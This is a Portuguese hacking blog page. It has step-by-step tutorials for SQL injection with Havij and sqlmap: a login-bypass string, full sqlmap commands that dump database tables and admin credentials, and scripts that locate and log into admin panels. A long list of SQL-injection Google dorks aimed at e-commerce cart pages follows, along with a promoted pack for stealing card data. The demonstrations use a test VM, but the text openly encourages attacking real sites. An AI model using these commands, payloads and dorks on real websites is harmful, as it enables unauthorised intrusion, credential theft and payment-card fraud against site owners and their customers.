kali linux: Tutorial Video

Mostrando postagens com marcador Tutorial Video. Mostrar todas as postagens

domingo, 30 de abril de 2017

havij invasao de sites

havij invasao de sites, havij e um programa hacker para ser usado no windows e sua função e encontrar falhas como sql injection ele encontra vulnerabilidades web que contenha falha no banco de dados seja mysql e outros, feito pela equipe de hackers ITSecTeam que encerrou todas as suas atividades em 2015 assim fechado o projeto do havij, sua ultima versão lançada foi a 1.17 pro que era paga mais depois foi crackeada e ficou livre para qualquer um fazer o download e usa para invadi sites pela internet, esses são algumas bancos de dados que o havij consegue invadir

havij invasao bancos de dados

MsSQL 2000/2005 with error
MsSQL 2000/2005 no error union based
MsSQL Blind
MySQL time based
MySQL union based
MySQL Blind
MySQL error based
MySQL time based
Oracle union based
Oracle error based
PostgreSQL union based
MsAccess union based
MsAccess Blind
Sybase (ASE)
Sybase (ASE) Blind

havij invasao de sites sql injection

tutorial havij invasão de sites, iremos usa o programa para explora uma falha de sql injection em uma aplicação web que resultara em roubo do banco de dados assim pegando a senha de admin do site e tendo controle total do site invadido podendo altera todo seu conteúdo vamos ao tutorial

havij invasao bancos de dados tutorial

havij invasao de sites e bancos de dados, primeiro o teste sera feito em uma maquina virtual que e vulnerável a sql injetion através da função get, o sql injetion pode ser explorado de duas formas a função get através da url do site vulnerável, colocando apenas uma aspas simples no final da url do site pode fazer com que o site mostre um erro no banco de dados, a função post esta em comentários ou em formulários de registro de sites ou em login como por exemplo a apagina de admin de um site pode ser vulnerável a função post por exemplo você conseguiria invadir um site vulneravél a sql injection apenas digitando isso no login do admin no user e password, ‘ or 1=1– abaixo se tem a maquina virtual vulneravel a sql injetion caso queira baixar clique no link: MAQUINA VIRTUAL SQL INJETIJON DOWNLOAD

só e clica em qualquer link desses que esta aparecendo e vai mostra uma pagina vulnerável a sql injetion veja a baixo

vamos selecionar e copia e cola no programa para fazer o invadir o banco de dados vamos usa o havij para invasao

com a url do site colada e só clica em analyze e o programa ira fazer a invasão se o site estive vulnerável

veja o site esta vulnerável e o banco de dados e exploit vamos clica em tables para pegar as tabelas do banco de dados

marque a caixa do banco de dados e clique em get tables para pega as tabelas

depois de clica em get tables veja que apareceu uma tabela com o nome members vamos ver o que tem la

marque menbers e clique em get columns para pega as colunas

vamos ver o que tem em username e password, marque username e password e clique get data para pega as senhas e username

pegamos a senha do admin que esta em texto plano mas normalmente esta em md5 ou em sha1 que e um tipo de criptografia mas pode ser quebrada em brutuforce usado scripts com worldlist como script em python ou em perl tambem tem sites com bancos de dados que já tem varias em senhas em md5 e sha1 você pode procura em um desses sites, agora vamos achar a pagina de admin clique em find admin

veja que a pagina de admin foi encontrada, vamos abrir-la no navegador

agora vamos colocar a senha do admin no campo abaixo

veja que a senha funcionou e temos administração do site

havij invasao tutorial completo

veja o tutorial foi feito usando o método get em uma maquina virtual

tecnica utlizada sql injection
sistema operacional utilizado windows 8.1
programa utilizado havij
sistema invadido, maquina virtul exploit
todo o teste foi feito em rede local

Unknown 0

domingo, 26 de fevereiro de 2017

Tutorial Video 13:14

windows hack invasão de sites com sqlmap

windows hack

windows hack com sqlmap

windows hack invasao de sites com sqlmap, nesse tutorial iremos usar o windows 8.1 como maquina atacante para invasao de sites com sqlmap ,os requirimentos para o tutorial são instalar python no seu computador windows entre no link: https://www.python.org/downloads/windows outro e baixar o sqlmap para o seu windows entre no link: http://sqlmap.org primeiro vá no site do python e baixe o executavel e instale no seu computador

python para windows

agora vá no site do sqlmap no link: http://sqlmap.org baixe o sqlmap

windows hack invasao de sites com sqlmap

windows hack sqlmap

windows hack tutorial

windows hack invasao com sqlmap, bem depois de baixa o python para o seu computador windows vá na pasta do python no diretório C:\ faça uma pasta com o nome de pentest e cole a pasta do sqlmap la.

agora abra o cmd ou o powershell e digite cmd e aperte enter e va na pasta no a onde você colocou o sqlmap e digite o comando sqlmap.py --help ira aparecer no prompt de comandos as opções do sqlmap

windows hack powershell windows 8.1

iremos ver a maquina virtual de teste para sql injetion no método get só vamos da o comando ping no ip da maquina virtual para ver se ela reponde caso queira baixar a maquina virtual para teste vá no link: MAQUINA VIRTUAL PARA TESTES SQL INJETION e escolha a opção VMWARE IMAGE e faça o download da maquina virtual para testes de invasão em sql injetion bem agora vamos da um ping na maquina virtual. a senha para acesso a maquina virtual e user: exploit password: exploit

bem funcionou vamos ir ate o ip da maquina virtual abra o seu navegador e cole o ip da maquina virtual ou vá ate um site que você queira invadir

windows hack sql injetion

bem agora vamos escolher um dos links para podemos pega uma das url vulnerável ao ataque sql injetion.

bem vamos pega a url e fazer o ataque digite o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 --current-db e aperte enter

-u: coloque a url do site
--current-db: o banco de dados atual do site

windows hack sqlmap

o sqlmap vai fazendo vários testes no site para ver se ele esta vulnerável a sql injetion, talvez o sqlmap faça algumas perguntas só aperte enter

windows hack com sqlmap

o site esta veraneável a sql injetion e o banco de dados atual do site e o EXPLOIT

agora vamos digita o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 -D exploit --tables

-u: coloque a url do site

-D: o banco de dados do site

--tables: as tabelas do banco de dados do site

windows hack prompt sqlmap

veja a baixo o sqlmap pegou as tabelas do banco de dados exploit do site vulnerável a sql injetion, vamos escolher a coluna members me parece ser muito interessante talvez a senha do admin do site esteja lá .

agora vamos as colunas da tabela members, digite o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 -D exploit -T members --columns

-u: coloque a url do site
-D: banco de dados
-T: tabelas do banco de dados
-columns: colunas da tabelas

windows hack powershell

veja a baixo as colunas da tabela member tem username e password

agora vamos pega o conteúdo das colunas password e username, digite o comando sqlmap.py -u http://192.168.19.137/newpage.php?id=3 -D exploit -T members -C password,username --dump

-u: coloque a url do site
-D: banco de dados
-T: tabelas do banco de dados
--columns: colunas da tabelas
--dump: pega o conteúdo das colunas

windows hack powershell hacker

veja abaixo que pegamos o username e o password, o username esta em branco porque fiz alguns testes antes e atualizei o sqlmap talvez isso pode ter afetado os resultados mais o username e admin.

agora vamos no local a onde o sqlmap guardou as informações do banco de dados, veja ele esta no disco C:\users\hibrido\sqlmap\out\192.168.19.137 vamos ver o diretório, vamos abrir com o wordpad

sqlmap output

bem agora vamos tenta achar a pagina do admin do site então entre no links abaixo, esses links são de scripts em python mas irei deixa um script em perl claro que para você usa o script em perl você precisa de perl no seu windows então em caso queira baixar perl entre no link: http://www.activestate.com/activeperl/downloads bem entre no links e pegue os scripts para encontrar a pagina de admin

pagina admin scripts

https://github.com/bdblackhat/admin-panel-finder python
https://github.com/Hadesy2k/admin-finder python
https://gist.github.com/kenkit/3052939 perl

bem abra a pasta pentest que criamos antes e coloque a pasta o script la, o script usado sera em python.

windows hack

entre na pasta do script e digite adm-finder.py e ira abrir uma tela para você colocar a url do site

copie a url e cole o script ira tenta em contra a pagina de administração do site, veja que a pagina de admin foi encontrada http://192.168.19.137/admin

vamos abrir o browser e ir para a pagina de admin

pagina admin

agora vamos testa o username e password que encontramos. veja que o site foi invadido agora se pode fazer o que quiser com ele.

windows hack livro para invasão

livro do sqlmap, tenha o livro do sqlmap e aprenda os comandos e suas funcionalidades.

download

sql injetion dorks para invasão de sites

bem irei deixa aqui algumas dorks de sql injetion para invasão de sites e também um pack de dorks sql injetion para invasão de lojas isso mesmo um pack de dorks para infocc caso queira fazer o download do pack de dorks para infocc clique no link: PACK INFOCC

algumas dorks sql 2017

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=
comersus_optReviewReadExec.php?idProduct=
comersus_viewItem.php?idProduct=
comments_form.php?ID=
contact.php?cartId=
content.php?id=
customerService.php?****ID1=
default.php?catID=
description.php?bookid=
details.php?BookID=
details.php?Press_Release_ID=
details.php?Product_ID=
details.php?Service_ID=
display_item.php?id=
displayproducts.php
downloadTrial.php?intProdID=
emailproduct.php?itemid=
emailToFriend.php?idProduct=
events.php?ID=
faq.php?cartID=
faq_list.php?id=
faqs.php?id=
feedback.php?title=
freedownload.php?bookid=
fullDisplay.php?item=
getbook.php?bookid=
GetItems.php?itemid=
giftDetail.php?id=
help.php?CartId=
home.php?id=
index.php?cart=
index.php?cartID=
index.php?ID=
info.php?ID=
item.php?eid=
item.php?item_id=
item.php?itemid=
item.php?model=
item.php?prodtype=
item.php?shopcd=
item_details.php?catid=
item_list.php?maingroup
item_show.php?code_no=
itemDesc.php?CartId=
itemdetail.php?item=
itemdetails.php?catalogid=
learnmore.php?cartID=
links.php?catid=
list.php?bookid=
List.php?CatID=
listcategoriesandproducts.php?idCategory=
modline.php?id=
myaccount.php?catid=
news.php?id=
order.php?BookID=
order.php?id=
order.php?item_ID=
OrderForm.php?Cart=

Unknown 0

sábado, 2 de julho de 2016

Tutorial Video 10:50

como adicionar a url do seu site ou blog ao google

como adicionar a url do seu site ou blog ao google e muito fácil para adicionar url do seu site ao google basta apenas digitar no seu buscador "como adicionar a url do seu site ou blog ao google" e o site do google ira aparecer na primeira pagina isso mesmo e o primeiro site, como podem ver a baixo eu escrevi adicionar url google

agora entre no primeiro site para adicionar a url do seu site ou blog ao google.

como adicionar a url do seu site ou blog ao google

adicione a url do seu blog ou site e abaixo escreve uma descrição do seu site por exemplo "kali linux, hackudao, kalilinux, hibrido1337"

agora você vai para essa pagina faça o capchar e aperte enter pronto você acaba de adicionar a url do seu site ou blog ao google.

Unknown 0

terça-feira, 21 de junho de 2016

Tutorial Video 12:59

Como Bloqueiar O Plugin Adblock

Bem oi pessoal hoje vou ensinar Como Bloqueia O Plugin Adblock todos sabem que o uso do adblock

vem aumentando muito hoje em dia e fica muito difícil para quem trabalhar na internet como por exemplo

trabalhar com youtube que você recebe com o google adsense isso reduz drasticamente os seus ganhos tanto

no youtube com suas visualizações quanto para pessoas que trabalhar com blog ou sites que usar ads ou pop under.

Bem se tem uma maneira de bloqueiar os usuarios que usam esses plugin do adblok que tem o objetivo

de bloqueiar propagandas assim dinuindo seus ganhos vamos começar o tutorial vou fazer isso com o

blogger do google que e um dominio gratuito e muito facil primeiro vamos para o site lick bloqueador-adblock

com esse site e onde vamos pegar o script que vai indentificar o plugin do adblock no navegador do usuario

assim o forçado a desativa-lo bem primeiro vamos ao site.

click aqui para ir para o site link bloqueador-adblock

como podem ver vocês podem clicar em "get the free script" que esta no menu do site para pagar o script

ou basta descer

e clicar em "get the free adblock script" bem aqui só e pegar esse código e colocar em seu site

coloque acima da tag </body> e pronto mas também vocês podem customizar o script

aqui para customizar vocês podem colocar o texto para a parece para o usuário

aqui vocês colocam a o tempo e esse e o tempo quando o usuário entrar em seu site ele será bloqueado

para desbloquear o conteúdo do site ele terá que desativa o adblock

depois de tudo configurado e só descer e clikar em "i´m ready generate my custom blockadblock code!"

bem agora vamos pegar o código e colocar no blogger pegue o código copie e vá no blogger

agora vá em layout

vá em html e javascript adicionar novo javascript em editar

pegue o código cole e clica em salva

pronto já colocamos o script em nosso blogger agora vamos entrar com o adblock desativado

agora vamos ver com o adblock ativado

veja como fica o script configurado

Unknown 0

kali linux

Post Top Ad

Post Top Ad

domingo, 30 de abril de 2017

havij invasao de sites

havij invasao bancos de dados

havij invasao de sites sql injection

havij invasao bancos de dados tutorial

havij invasao tutorial completo

domingo, 26 de fevereiro de 2017

windows hack invasão de sites com sqlmap

windows hack com sqlmap

windows hack tutorial

pagina admin scripts

pagina admin

agora vamos testa o username e password que encontramos. veja que o site foi invadido agora se pode fazer o que quiser com ele.

windows hack livro para invasão

livro do sqlmap, tenha o livro do sqlmap e aprenda os comandos e suas funcionalidades.

download

windows hack livro para invasão

sql injetion dorks para invasão de sites

sábado, 2 de julho de 2016

como adicionar a url do seu site ou blog ao google

terça-feira, 21 de junho de 2016

Como Bloqueiar O Plugin Adblock

Author Details

Ads

Marcadores

Quem sou eu

Seguidores

Visualizações

Recent

ads

ads

Popular

kali linux

Post Top Ad

Post Top Ad

domingo, 30 de abril de 2017

havij invasao de sites

havij invasao bancos de dados

havij invasao de sites sql injection

havij invasao bancos de dados tutorial

havij invasao tutorial completo

domingo, 26 de fevereiro de 2017

windows hack invasão de sites com sqlmap

windows hack com sqlmap

windows hack tutorial

pagina admin scripts

pagina admin agora vamos testa o username e password que encontramos. veja que o site foi invadido agora se pode fazer o que quiser com ele. windows hack livro para invasão livro do sqlmap, tenha o livro do sqlmap e aprenda os comandos e suas funcionalidades. download

windows hack livro para invasão

sql injetion dorks para invasão de sites

sábado, 2 de julho de 2016

como adicionar a url do seu site ou blog ao google

terça-feira, 21 de junho de 2016

Como Bloqueiar O Plugin Adblock

Author Details

Ads

Marcadores

Quem sou eu

Seguidores

Visualizações

Recent

ads

ads

Popular

pagina admin

agora vamos testa o username e password que encontramos. veja que o site foi invadido agora se pode fazer o que quiser com ele.

windows hack livro para invasão

livro do sqlmap, tenha o livro do sqlmap e aprenda os comandos e suas funcionalidades.

download